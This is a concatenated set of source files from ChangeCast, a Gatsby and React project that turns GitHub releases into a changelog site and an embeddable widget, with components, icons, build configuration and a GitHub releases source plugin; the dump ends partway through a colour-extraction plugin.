import React from 'react'
import Helmet from 'react-helmet'
import { LinkButton } from '../components/Button/LinkButton'
import { Favicons } from '../components/Favicons'
import { FocusStyles } from '../components/FocusStyles'
import { Header } from '../components/Header'
import { Release } from '../components/Release/Release'
import { SiteWrapper } from '../components/SiteWrapper'
import { useSiteSetup } from '../hooks/useSiteSetup'
import { globalStyles } from '../styles/global'
import { getOgImageSrc } from '../utils/data'
const ReleaseTemplate = ({
data,
data: {
release: {
name: releaseName,
tagName,
publishedAt,
childGithubReleaseBody: {
childMarkdownRemark: { html, plainText },
},
},
},
pageContext: { isWidget },
}) => {
const tagOgImageSrc = getOgImageSrc(data)
const [searchValue, setSearchValue] = React.useState('')
const mark = React.useRef()
const search = React.useRef(null)
function getReleaseSearch() {
if (search.current !== null) {
return search.current
}
const debouncedMark = debounce(value => {
if (mark.current) {
mark.current.unmark()
}
mark.current = new Mark(document.querySelectorAll('.release'))
mark.current.mark(value)
}, 100)
search.current = value => {
setSearchValue(value)
debouncedMark(value)
}
return search.current
}
const {
faviconElements,
primaryColor,
logoSrc,
title,
description,
homepage,
url,
htmlUrl,
} = useSiteSetup()
const siteTitle = `${title} ${tagName}`
return (
<>
<Favicons favicons={faviconElements} />
<Global styles={globalStyles} />
<FocusStyles />
<Helmet
title={siteTitle}
meta={[
{ property: 'og:title', content: siteTitle },
{ name: 'description', content: description },
{
property: 'og:url',
content: `${url}/${tagName}`,
},
{
property: 'og:image',
content: `${url}${tagOgImageSrc}`,
},
{ name: 'twitter:card', content: 'summary_large_image' },
{
name: 'twitter:url',
content: `${url}/${tagName}`,
},
{ name: 'twitter:title', content: `${title} ${tagName}` },
{
name: 'twitter:image',
content: `${url}${tagOgImageSrc}`,
},
]}
/>
<Header
homepage={homepage}
htmlUrl={htmlUrl}
logoSrc={logoSrc}
primaryColor={primaryColor}
setSearchValue={getReleaseSearch()}
searchValue={searchValue}
/>
<SiteWrapper>
<LinkButton to="/" css={{ marginBottom: '0.5rem' }}>
<ChevronLeft css={{ marginLeft: '-0.25rem' }} /> All Releases
</LinkButton>
<Release
releaseName={releaseName}
tagName={tagName}
publishedAt={publishedAt}
html={html}
plainText={plainText}
embeddedInIframe={false}
primaryColor={primaryColor}
url={url}
/>
</SiteWrapper>
</>
)
}
export const query = graphql`
query ReleaseTemplateQuery($tagName: String!, $ogText: String!) {
repository: allGithubRepo {
edges {
node {
avatarImageFile: childFile {
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
}
}
logo: allFile(filter: { name: { eq: "logo" } }) {
edges {
node {
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
}
release: githubRelease(tagName: { eq: $tagName }) {
name
tagName
publishedAt
childGithubReleaseBody {
childMarkdownRemark {
html
plainText
}
}
}
}
`
export default ReleaseTemplate
<|start_filename|>Dockerfile<|end_filename|>
FROM node:10
COPY . /changecast
RUN cd /changecast && yarn
ENTRYPOINT ["/changecast/action/entrypoint.sh"]
LABEL "com.github.actions.name"="ChangeCast"
LABEL "com.github.actions.description"="Create beautiful, performant, accessible changelogs from your Github releases."
LABEL "com.github.actions.icon"="radio"
LABEL "com.github.actions.color"="blue"
<|start_filename|>icons/ExternalLink.js<|end_filename|>
import React from 'react'
export const ExternalLink = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="ExternalLink_svg__feather ExternalLink_svg__feather-external-link"
{...props}
>
<path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6M15 3h6v6M10 14L21 3" />
</svg>
)
<|start_filename|>site/src/components/Button/AnchorButton.js<|end_filename|>
import React from 'react'
import { buttonStyles } from './Button'
export const AnchorButton = props => <a css={buttonStyles} {...props} />
<|start_filename|>icons/AbstractIcon3.js<|end_filename|>
import React from 'react'
export const AbstractIcon3 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<defs>
<rect
id="AbstractIcon3_svg__a"
x={5.44}
width={8.56}
height={8.56}
rx={4.28}
/>
</defs>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g transform="translate(13 16)">
<rect fill="#4D61FC" width={8.56} height={8.56} rx={4.28} />
<use fill="#00396B" xlinkHref="#AbstractIcon3_svg__a" />
<rect
stroke="#E9F1FF"
x={4.94}
y={-0.5}
width={9.56}
height={9.56}
rx={4.78}
/>
</g>
</g>
</svg>
)
<|start_filename|>site/src/providers/WidgetProvider.js<|end_filename|>
import React from 'react'
import { CHANGECAST_LOCALSTORAGE_KEY } from '../utils/constants'
export function onClose() {
window.parent.postMessage('close', '*')
}
function closeOnEscape(e) {
if (e.key === 'Escape' || e.key === 'Esc' || e.keyCode === 27) {
e.preventDefault()
onClose()
}
}
export const WidgetContext = React.createContext(true)
export const WidgetProvider = ({ children }) => {
const [isOpen, setOpen] = React.useState(false)
const handleMessage = React.useCallback(event => {
if (event.data === 'open') {
setOpen(true)
window.localStorage.setItem(
CHANGECAST_LOCALSTORAGE_KEY,
new Date().toISOString()
)
} else if (event.data === 'close') {
setOpen(false)
}
})
React.useEffect(() => {
window.addEventListener('keydown', closeOnEscape, false)
window.addEventListener('message', handleMessage, true)
return () => {
window.removeEventListener('keydown', closeOnEscape)
window.removeEventListener('message', handleMessage)
}
})
return (
<WidgetContext.Provider value={isOpen}>{children}</WidgetContext.Provider>
)
}
<|start_filename|>site/src/styles/global.js<|end_filename|>
import { css } from '@emotion/core'
import '@reach/menu-button/styles.css'
import { theme } from './theme'
import { fonts } from './typography'
export const globalStyles = css`
* {
box-sizing: border-box;
}
html,
body {
font-family: ${fonts.regular}, sans-serif;
font-size: 16px;
font-weight: 400;
font-style: normal;
color: ${theme.color.text};
background: #f7f7f7;
text-rendering: optimizeLegibility;
-webkit-font-smoothing: antialiased;
-webkit-tap-highlight-color: transparent;
-ms-overflow-style: scrollbar;
}
a {
text-decoration: none;
&:hover {
text-decoration: underline;
}
}
`
<|start_filename|>site/src/components/WidgetWrapper.js<|end_filename|>
import React from 'react'
import { WidgetContext } from '../providers/WidgetProvider'
import { theme } from '../styles/theme'
export const WidgetWrapper = ({ children }) => {
const isOpen = React.useContext(WidgetContext)
return (
<main
css={{
width: '100vw',
height: '100vh',
paddingTop: 'calc(0.5rem + 54px)',
[theme.media.small]: {
padding: 'calc(0.5rem + 54px) 0.5rem 0.5rem 0.5rem',
},
overflow: isOpen ? 'scroll' : 'hidden',
WebkitOverflowScrolling: 'touch',
}}
>
{children}
</main>
)
}
<|start_filename|>docs/src/components/CenteredText.js<|end_filename|>
import React from 'react'
export const CenteredText = ({ color, children }) => (
<div
css={{
marginLeft: 'auto',
marginRight: 'auto',
textAlign: 'center',
marginBottom: 50,
maxWidth: 700,
}}
>
<p
css={{
marginLeft: 'auto',
marginRight: 'auto',
opacity: '0.9',
maxWidth: '80%',
color,
}}
>
{children}
</p>
</div>
)
<|start_filename|>site/src/components/FocusStyles.js<|end_filename|>
import React from 'react'
import { css, Global } from '@emotion/core'
const navigationKeyCodes = [9, 13, 27, 38, 40]
const zeroFocusOutline = css`
*:focus {
outline: 0;
}
`
export const FocusStyles = () => {
const [usingKeyboard, setUsingKeyboard] = React.useState(false)
const checkUsingKeyboard = React.useCallback(({ keyCode }) => {
if (navigationKeyCodes.includes(keyCode)) {
setUsingKeyboard(true)
}
}, [])
const notUsingKeyboard = React.useCallback(() => setUsingKeyboard(false), [])
React.useEffect(() => {
window.addEventListener('keyup', checkUsingKeyboard)
window.addEventListener('click', notUsingKeyboard)
return () => {
window.removeEventListener('keyup', checkUsingKeyboard)
window.removeEventListener('click', notUsingKeyboard)
}
}, [])
return <Global styles={usingKeyboard ? {} : zeroFocusOutline} />
}
<|start_filename|>plugins/gatsby-source-github-releases/gatsby-node.js<|end_filename|>
const Octokat = require('octokat')
const md5 = require('md5')
const parseGitUrl = require('git-url-parse')
const { linkify } = require('linkify-markdown')
const { createRemoteFileNode } = require(`gatsby-source-filesystem`)
exports.sourceNodes = async (
{ actions: { createNode }, createNodeId, createContentDigest, store, cache },
pluginOptions
) => {
const { owner, name } = parseGitUrl(pluginOptions.url)
const octo = new Octokat({ token: pluginOptions.token })
const repoResource = octo.repos(owner, name)
const repo = await repoResource.fetch()
const repoId = createNodeId(repo.fullName)
const repoContent = JSON.stringify(repo)
const releases = await repoResource.releases.fetchAll()
const releaseIds = []
releases.forEach(release => {
const releaseId = createNodeId(release.tagName)
const releaseBodyId = createNodeId(`${release.tagName}_body`)
const releaseContent = JSON.stringify(release)
releaseIds.push(releaseId)
createNode({
...release,
id: releaseId,
parent: repoId,
children: [releaseBodyId],
internal: {
type: 'GithubRelease',
contentDigest: createContentDigest(releaseContent),
content: releaseContent,
},
})
const releaseBodyContent = linkify(release.body, {
repository: pluginOptions.url,
})
createNode({
id: releaseBodyId,
parent: releaseId,
children: [],
internal: {
type: 'GithubReleaseBody',
mediaType: 'text/markdown',
contentDigest: createContentDigest(releaseBodyContent),
content: releaseBodyContent,
},
})
})
const avatarImageFile = await createRemoteFileNode({
url: repo.owner.avatarUrl,
store,
cache,
createNode,
createNodeId,
})
createNode({
homepage: null,
...repo,
id: repoId,
parent: null,
children: [...releaseIds, avatarImageFile.id],
internal: {
type: 'GithubRepo',
contentDigest: createContentDigest(repoContent),
content: repoContent,
},
})
}
<|start_filename|>docs/package.json<|end_filename|>
{
"name": "changecast-docs",
"private": true,
"description": "ChangeCast documentation and landing page.",
"version": "0.1.0",
"author": "<NAME> <<EMAIL>>",
"license": "MIT",
"scripts": {
"build": "gatsby build",
"develop": "gatsby develop",
"serve": "gatsby serve",
"now-build": "yarn build"
},
"dependencies": {
"@emotion/core": "^10.0.10",
"gatsby": "^2.1.22",
"gatsby-image": "^2.0.37",
"gatsby-plugin-emotion": "^4.0.4",
"gatsby-plugin-google-analytics": "^2.0.18",
"gatsby-plugin-react-helmet": "^3.0.7",
"gatsby-plugin-sharp": "^2.0.32",
"gatsby-plugin-typography": "^2.2.10",
"gatsby-source-filesystem": "^2.0.23",
"gatsby-transformer-favicons": "file:../plugins/gatsby-transformer-favicons",
"gatsby-transformer-og-image": "file:../plugins/gatsby-transformer-og-image",
"gatsby-transformer-sharp": "^2.1.17",
"icons": "0.1.0",
"normalize.css": "^8.0.1",
"react": "^16.8.1",
"react-dom": "^16.8.1",
"react-helmet": "^5.2.0",
"react-typography": "^0.16.19",
"typography": "^0.16.19"
},
"devDependencies": {}
}
<|start_filename|>site/src/utils/constants.js<|end_filename|>
export const CHANGECAST_LOCALSTORAGE_KEY = 'changecast'
<|start_filename|>site/src/components/Button/LinkButton.js<|end_filename|>
import { Link } from 'gatsby'
import React from 'react'
import { buttonStyles } from './Button'
export const LinkButton = props => <Link css={buttonStyles} {...props} />
<|start_filename|>site/src/hooks/useSiteSetup.js<|end_filename|>
import { graphql, useStaticQuery } from 'gatsby'
import {
getFaviconElements,
getLogoSrc,
getPrimaryColor,
getTitle,
} from '../utils/data'
export const useSiteSetup = () => {
const data = useStaticQuery(graphql`
query SiteSetupQuery {
site {
siteMetadata {
title
primaryColor
url
}
}
repository: allGithubRepo {
edges {
node {
name
description
homepage
htmlUrl
avatarImageFile: childFile {
fields {
colorPalette
}
childImageSharp {
original {
src
}
}
childFavicon {
faviconElements {
props
type
}
}
}
}
}
}
logo: allFile(filter: { name: { eq: "logo" } }) {
edges {
node {
fields {
colorPalette
}
childImageSharp {
original {
src
}
}
childFavicon {
faviconElements {
props
type
}
}
}
}
}
}
`)
const {
site: {
siteMetadata: { url },
},
repository: {
edges: [
{
node: { description, homepage, htmlUrl },
},
],
},
} = data
const primaryColor = getPrimaryColor(data)
const logoSrc = getLogoSrc(data)
const title = getTitle(data)
const faviconElements = getFaviconElements(data)
return {
faviconElements,
primaryColor,
logoSrc,
title,
description,
homepage,
htmlUrl,
url,
}
}
<|start_filename|>icons/AbstractIcon6.js<|end_filename|>
import React from 'react'
export const AbstractIcon6 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g fillRule="nonzero">
<path
d="M19.607 19.275h.025a3.14 3.14 0 0 0 3.137-3.138A3.14 3.14 0 0 0 19.632 13 6.64 6.64 0 0 0 13 19.632a6.639 6.639 0 0 0 3.643 5.919 3.832 3.832 0 0 1-.862-2.425 3.855 3.855 0 0 1 3.826-3.85z"
fill="#4D61FC"
/>
<path
d="M23.357 14.45c.539.662.862 1.506.862 2.424a3.855 3.855 0 0 1-3.85 3.851 3.14 3.14 0 0 0-3.138 3.138A3.14 3.14 0 0 0 20.368 27h.003A6.64 6.64 0 0 0 27 20.368a6.639 6.639 0 0 0-3.643-5.918z"
fill="#00396B"
/>
</g>
</g>
</svg>
)
<|start_filename|>docs/src/components/Section.js<|end_filename|>
import React from 'react'
export const Section = ({ background, children }) => (
<div css={{ padding: '120px 15px', background }}>{children}</div>
)
<|start_filename|>icons/AbstractIcon5.js<|end_filename|>
import React from 'react'
export const AbstractIcon5 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g transform="translate(12 13)">
<rect fill="#4D61FC" x={5} width={6} height={6} rx={3} />
<rect fill="#4D61FC" y={8} width={6} height={6} rx={3} />
<rect fill="#00396B" x={10} y={8} width={6} height={6} rx={3} />
</g>
</g>
</svg>
)
<|start_filename|>site/src/styles/theme.js<|end_filename|>
const fontSize = '16px'
const color = {
text: '#24292e',
accent: '#586069',
}
const breakpoint = {
small: 400,
medium: 800,
large: 1200,
xlarge: 1600,
}
const media = {
small: `@media(min-width: ${breakpoint.small}px)`,
medium: `@media(min-width: ${breakpoint.medium}px)`,
large: `@media(min-width: ${breakpoint.large}px)`,
xlarge: `@media(min-width: ${breakpoint.xlarge}px)`,
}
const markdown = {
color: {
blockquote: '#24292e',
accent: '#d6d6d6',
background: 'white',
text: '#24292e',
},
}
const code = {
color: {
background: 'initial',
comment: 'gray',
punctuation: 'black',
deleted: 'red',
inserted: 'green',
string: 'black',
keyword: 'black',
function: 'black',
variable: 'black',
},
}
export const theme = {
fontSize,
color,
breakpoint,
media,
markdown,
code,
}
<|start_filename|>icons/AbstractIcon8.js<|end_filename|>
import React from 'react'
export const AbstractIcon8 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g fillRule="nonzero">
<path
d="M23.723 18.901a.287.287 0 0 0-.26-.166h-3.398l3.355-5.295a.287.287 0 0 0-.243-.44h-4.589a.287.287 0 0 0-.256.159l-4.302 8.603a.286.286 0 0 0 .257.414h2.949l-3.214 7.632a.287.287 0 0 0 .484.296l9.177-10.897a.287.287 0 0 0 .04-.306z"
fill="#4D61FC"
/>
<path
d="M26.973 18.901a.287.287 0 0 0-.26-.166h-3.398l3.355-5.295a.287.287 0 0 0-.242-.44h-4.59a.287.287 0 0 0-.256.159l-4.302 8.603a.286.286 0 0 0 .257.414h2.949l-3.214 7.632a.287.287 0 0 0 .484.296l9.177-10.897a.287.287 0 0 0 .04-.306z"
stroke="#E9F1FF"
fill="#00396B"
/>
</g>
</g>
</svg>
)
<|start_filename|>icons/Cast.js<|end_filename|>
import React from 'react'
export const Cast = props => (
<svg width={24} height={24} viewBox="0 0 24 24" {...props}>
<g fill="currentColor" fillRule="nonzero">
<path d="M16.031 23.237a1.001 1.001 0 0 1-.367-1.931A9.942 9.942 0 0 0 22 12c0-5.514-4.486-10-10-10S2 6.486 2 12c0 4.13 2.48 7.781 6.319 9.302a1 1 0 1 1-.736 1.86A11.945 11.945 0 0 1 0 12C0 5.383 5.383 0 12 0s12 5.383 12 12c0 4.965-2.984 9.349-7.603 11.168-.12.047-.244.069-.366.069z" />
<path d="M9.07 19.359a.987.987 0 0 1-.418-.092A8.026 8.026 0 0 1 4 12c0-4.411 3.589-8 8-8s8 3.589 8 8a7.958 7.958 0 0 1-4.459 7.176 1 1 0 0 1-.887-1.793A5.968 5.968 0 0 0 18 12c0-3.309-2.691-6-6-6s-6 2.691-6 6a6.02 6.02 0 0 0 3.489 5.451 1 1 0 0 1-.419 1.908z" />
<path d="M15 12c0-1.654-1.346-3-3-3s-3 1.346-3 3c0 1.302.838 2.401 2 2.815V23a1 1 0 1 0 2 0v-8.185A2.995 2.995 0 0 0 15 12zm-3 1c-.551 0-1-.449-1-1 0-.551.449-1 1-1 .551 0 1 .449 1 1 0 .551-.449 1-1 1z" />
</g>
</svg>
)
<|start_filename|>site/src/utils/copyToClipboard.js<|end_filename|>
export const copyToClipboard = str => {
const el = document.createElement('textarea') // Create a <textarea> element
el.value = str // Set its value to the string that you want copied
el.setAttribute('readonly', '') // Make it readonly to be tamper-proof
el.style.position = 'absolute'
el.style.left = '-9999px' // Move outside the screen to make it invisible
document.body.appendChild(el) // Append the <textarea> element to the HTML document
const selectedContent = document.getSelection()
const selected =
selectedContent && selectedContent.rangeCount > 0
? selectedContent.getRangeAt(0)
: false
el.select() // Select the <textarea> content
document.execCommand('copy')
document.body.removeChild(el) // Remove the <textarea> element
if (selected && selectedContent) {
// If a selection existed before copying
selectedContent.removeAllRanges() // Unselect everything on the HTML document
selectedContent.addRange(selected) // Restore the original selection
}
}
<|start_filename|>docs/src/components/Header.js<|end_filename|>
import { graphql, useStaticQuery } from 'gatsby'
import Img from 'gatsby-image'
import { Radio } from 'icons/Radio'
import React from 'react'
import { AnchorButton } from './Button/AnchorButton'
import { Button } from './Button/Button'
import { LinkButton } from './Button/LinkButton'
export const Header = () => {
const {
file: {
childImageSharp: { fluid },
},
} = useStaticQuery(graphql`
query {
file(relativePath: { eq: "oleg-laptev-546607-unsplash.png" }) {
childImageSharp {
fluid(maxWidth: 600) {
...GatsbyImageSharpFluid_tracedSVG
}
}
}
}
`)
return (
<>
<header
css={{
position: 'relative',
background: '#f0f0f0',
}}
>
<nav
css={{
padding: '20px 0',
'@media (max-width: 600px)': {
padding: '10px 0',
},
}}
>
<div
css={{
marginRight: 'auto',
marginLeft: 'auto',
padding: '0 15px',
'@media (max-width: 600px)': {
padding: 0,
},
maxWidth: 1080,
}}
>
<div
css={{
display: 'flex',
flexWrap: 'wrap',
justifyContent: 'space-between',
alignItems: 'center',
}}
>
<LinkButton
to="/"
css={{
display: 'flex',
alignItems: 'center',
}}
>
<Radio css={{ color: 'black' }} />
<span
css={{
fontWeight: 'bold',
color: 'black',
marginLeft: '1rem',
}}
>
ChangeCast
</span>
</LinkButton>
<ul
css={{
padding: '0',
margin: '0',
listStyle: 'none',
display: 'flex',
alignItems: 'center',
'@media (max-width: 600px)': {
display: 'none',
},
}}
>
<li
css={{
marginRight: 15,
marginBottom: 0,
display: 'flex',
alignItems: 'center',
}}
>
<Button
css={{ color: 'black' }}
data-changecast-changecast={true}
>
What's New?
</Button>
</li>
<li
css={{
marginBottom: 0,
display: 'flex',
alignItems: 'center',
}}
>
<AnchorButton
href="https://github.com/palmerhq/changecast"
css={{ color: 'black' }}
>
Github
</AnchorButton>
</li>
</ul>
</div>
</div>
</nav>
<div
css={{
marginLeft: 'auto',
marginRight: 'auto',
width: '100%',
height: '80vh',
'@media (max-width: 600px)': {
height: 0,
flexDirection: 'column-reverse',
},
minHeight: 530,
maxWidth: 1080,
display: 'flex',
alignItems: 'center',
justifyContent: 'center',
}}
>
<div
css={{
maxWidth: '500px',
padding: '0 20px',
width: '50%',
'@media (max-width: 600px)': {
width: '100%',
},
}}
>
<h2
css={{
color: 'black',
fontSize: '3em',
'@media (max-width: 600px)': {
fontSize: '2em',
},
}}
>
Keep users informed.
</h2>
<p css={{ color: 'black' }}>
Create{' '}
<span css={{ color: 'royalblue', fontWeight: 'bold' }}>
beautiful
</span>
,{' '}
<span css={{ color: 'royalblue', fontWeight: 'bold' }}>
performant
</span>
,{' '}
<span css={{ color: 'royalblue', fontWeight: 'bold' }}>
accessible
</span>{' '}
changelogs from your Github releases.
</p>
</div>
<div
css={{
display: 'flex',
justifyContent: 'center',
width: '50%',
padding: '0 50px',
'@media (max-width: 600px)': {
width: '100%',
maxWidth: 400,
padding: '0 75px',
},
}}
>
<Img
fluid={fluid}
style={{
width: '100%',
}}
imgStyle={{
width: '100%',
}}
/>
</div>
</div>
</header>
</>
)
}
<|start_filename|>icons/Close.js<|end_filename|>
import React from 'react'
export const Close = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Close_svg__feather Close_svg__feather-x"
{...props}
>
<path d="M18 6L6 18M6 6l12 12" />
</svg>
)
<|start_filename|>widget/webpack.config.js<|end_filename|>
const path = require('path')
const crypto = require('crypto')
const webpack = require('webpack')
const copyWebpackPlugin = require('copy-webpack-plugin')
const { config } = require('dotenv')
config({ path: path.resolve('..', '.env') })
const bundleOutputDir = '../site/static'
const repoHash = crypto
.createHash(`md5`)
.update(process.env.REPO_URL)
.digest(`hex`)
const shortRepoHash = repoHash.substr(repoHash.length - 5)
module.exports = (env, { mode }) => {
return [
{
entry: './src/widget.js',
output: {
filename: 'widget.js',
path: path.resolve(bundleOutputDir),
},
devServer: {
contentBase: bundleOutputDir,
},
optimization: {
minimize: mode === 'production',
},
plugins: [
new webpack.EnvironmentPlugin({
URL: process.env.DEPLOY_URL || process.env.URL || '',
REPO_HASH: shortRepoHash,
}),
...(mode === 'development'
? [
new webpack.SourceMapDevToolPlugin(),
new copyWebpackPlugin([{ from: './' }]),
]
: []),
],
module: {
rules: [
{
test: /\.css$/,
use: [
'style-loader',
{
loader: 'css-loader',
options: {
modules: true,
hashPrefix: shortRepoHash,
},
},
],
},
{
test: /\.js$/,
exclude: /node_modules/,
use: {
loader: 'babel-loader',
options: {
presets: [
[
'@babel/env',
{
targets: {
browsers: ['ie 6', 'safari 7'],
},
},
],
],
},
},
},
],
},
},
]
}
<|start_filename|>icons/AbstractIcon9.js<|end_filename|>
import React from 'react'
export const AbstractIcon9 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<path fill="#4D61FC" d="M16.943 13.96l5.94 5.939-5.94 5.94-5.94-5.94z" />
<path fill="#00396B" d="M22.855 13.96l5.94 5.939-5.94 5.94-5.94-5.94z" />
<path fill="#EAF0FF" d="M19.857 16.957l2.97 2.97-2.97 2.97-2.97-2.97z" />
</g>
</svg>
)
<|start_filename|>icons/AbstractIcon12.js<|end_filename|>
import React from 'react'
export const AbstractIcon12 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<defs>
<path id="AbstractIcon12_svg__a" d="M3 0h10v12l-5 3-5-3z" />
</defs>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g transform="matrix(1 0 0 -1 12 27)">
<path fill="#00396B" d="M0 1h16v7.67H0z" />
<use fill="#4D61FC" xlinkHref="#AbstractIcon12_svg__a" />
<path stroke="#EAF0FF" d="M3.5.5v11.217l4.5 2.7 4.5-2.7V.5h-9z" />
</g>
</g>
</svg>
)
<|start_filename|>docs/gatsby-node.js<|end_filename|>
const path = require('path')
exports.createPages = async ({ graphql, actions: { createPage } }) => {
const indexTemplate = path.resolve('./src/templates/IndexTemplate.js')
const ogText = 'ChangeCast'
createPage({
path: `/`,
component: indexTemplate,
context: {
ogText,
},
})
}
<|start_filename|>icons/Search.js<|end_filename|>
import React from 'react'
export const Search = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Search_svg__feather Search_svg__feather-search"
{...props}
>
<circle cx={11} cy={11} r={8} />
<path d="M21 21l-4.35-4.35" />
</svg>
)
<|start_filename|>icons/AbstractIcon4.js<|end_filename|>
import React from 'react'
export const AbstractIcon4 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<path fill="#4D61FC" d="M20 13l7 8.235H13z" />
<path stroke="#E9F1FF" fill="#00396B" d="M20 17.588L28 27H12z" />
</g>
</svg>
)
<|start_filename|>site/src/components/Release/Release.js<|end_filename|>
import { Clipboard } from 'icons/Clipboard'
import { Facebook } from 'icons/Facebook'
import { Linkedin } from 'icons/Linkedin'
import { Twitter } from 'icons/Twitter'
import React from 'react'
import { markdownStyles } from '../../styles/markdown'
import { theme } from '../../styles/theme'
import { copyToClipboard } from '../../utils/copyToClipboard'
import { windowPopup } from '../../utils/windowPopup'
import { ReleaseHeader } from './ReleaseHeader'
import { SocialButton } from './SocialButton'
export const Release = React.memo(
({
releaseName,
tagName,
publishedAt,
plainText,
html,
isWidget,
primaryColor,
url,
}) => {
const [red, green, blue] = primaryColor
const shareableUrl = `${url}/${tagName}`
const title = releaseName || tagName
return (
<div
css={{
position: 'relative',
width: '100%',
marginBottom: '0.5rem',
background: 'white',
borderRadius: 0,
borderTop: '1px solid lightgray',
borderBottom: '1px solid lightgray',
[theme.media.small]: {
borderRadius: 3,
border: '1px solid lightgray',
},
}}
>
<ReleaseHeader
title={title}
tagName={tagName}
publishedAt={publishedAt}
isWidget={isWidget}
primaryColor={primaryColor}
url={url}
/>
<div css={{ padding: '0 1rem', margin: '1rem 0' }}>
{plainText ? (
<div
className="release"
css={[
markdownStyles,
{
a: {
color: `rgb(${red}, ${green}, ${blue})`,
},
[`*:not(pre) > code[class*='language-'], pre[class*='language-']`]: {
background: `rgb(${red}, ${green}, ${blue}, 0.1)`,
},
},
]}
dangerouslySetInnerHTML={{ __html: html }}
/>
) : (
<em>No release notes.</em>
)}
</div>
<div
css={{
display: 'flex',
justifyContent: 'flex-end',
borderTop: '1px solid lightgray',
padding: '0.5rem',
}}
>
<SocialButton
label="Share on Facebook"
icon={Facebook}
onClick={() =>
windowPopup(
`https://www.facebook.com/sharer/sharer.php?u=${encodeURIComponent(
shareableUrl
)}`,
500,
300
)
}
/>
<SocialButton
label="Share on Twitter"
icon={Twitter}
onClick={() =>
windowPopup(
`https://twitter.com/intent/tweet?url=${encodeURIComponent(
shareableUrl
)}`,
500,
300
)
}
/>
<SocialButton
label="Share on Linkedin"
icon={Linkedin}
onClick={() =>
windowPopup(
`https://www.linkedin.com/shareArticle?url=${encodeURIComponent(
shareableUrl
)}&mini=true`,
500,
300
)
}
/>
<SocialButton
label="Copy link"
icon={Clipboard}
onClick={() => copyToClipboard(shareableUrl)}
/>
</div>
</div>
)
}
)
<|start_filename|>site/src/components/Release/ReleaseHeader.js<|end_filename|>
import {
differenceInDays,
distanceInWordsToNow,
format,
isThisYear,
} from 'date-fns'
import { Link } from 'gatsby'
import React from 'react'
import { theme } from '../../styles/theme'
import { CHANGECAST_LOCALSTORAGE_KEY } from '../../utils/constants'
import { Tag } from '../Tag'
export const ReleaseHeader = ({
title,
tagName,
publishedAt,
isWidget,
primaryColor: [red, green, blue],
url,
...rest
}) => {
const lastViewed =
typeof window !== 'undefined' &&
window.localStorage.getItem(CHANGECAST_LOCALSTORAGE_KEY)
const isNew = lastViewed && new Date(lastViewed) < new Date(publishedAt)
return (
<div
css={{
padding: '1rem',
display: 'flex',
alignItems: 'center',
justifyContent: 'space-between',
borderBottom: '1px solid lightgray',
background: 'white',
}}
{...rest}
>
<div css={{ display: 'flex', alignItems: 'center' }}>
<h2
css={{
margin: '0',
}}
>
{isWidget ? (
<a
href={`/${tagName}`}
target="_blank"
rel="noopener noreferrer"
css={{ color: `rgb(${red}, ${green}, ${blue})` }}
>
{title}
</a>
) : (
<Link
to={`/${tagName}`}
css={{ color: `rgb(${red}, ${green}, ${blue})` }}
>
{title}
</Link>
)}
</h2>
{isNew && (
<Tag
css={{
margin: '0 1rem',
backgroundColor: `rgb(${red}, ${green}, ${blue})`,
}}
>
New
</Tag>
)}
</div>
{typeof window !== 'undefined' && (
<p
css={{
color: theme.color.accent,
margin: 0,
flexShrink: 0,
}}
>
{differenceInDays(Date.now(), publishedAt) < 30
? distanceInWordsToNow(publishedAt, {
addSuffix: true,
})
: isThisYear(publishedAt)
? format(publishedAt, 'MMM D')
: format(publishedAt, 'MMMM Do, YYYY')}
</p>
)}
</div>
)
}
<|start_filename|>docs/src/components/Features.js<|end_filename|>
import React from 'react'
export const Features = ({ children }) => (
<div
css={{
marginRight: 'auto',
marginLeft: 'auto',
padding: '0 15px',
maxWidth: '1080px',
}}
>
<ul
css={{
padding: '0',
margin: '0',
listStyle: 'none',
display: 'flex',
justifyContent: 'space-between',
alignItems: 'flex-start',
flexWrap: 'wrap',
marginTop: '60px',
['@media (max-width: 990px)']: {
justifyContent: 'center',
},
}}
>
{children}
</ul>
</div>
)
<|start_filename|>icons/Linkedin.js<|end_filename|>
import React from 'react'
export const Linkedin = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Linkedin_svg__feather Linkedin_svg__feather-linkedin"
{...props}
>
<path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6zM2 9h4v12H2z" />
<circle cx={4} cy={4} r={2} />
</svg>
)
<|start_filename|>plugins/gatsby-transformer-color-thief/gatsby-node.js<|end_filename|>
const { getColorFromURL, getPaletteFromURL } = require('color-thief-node')
const luminance = require('relative-luminance')
exports.onCreateNode = async ({
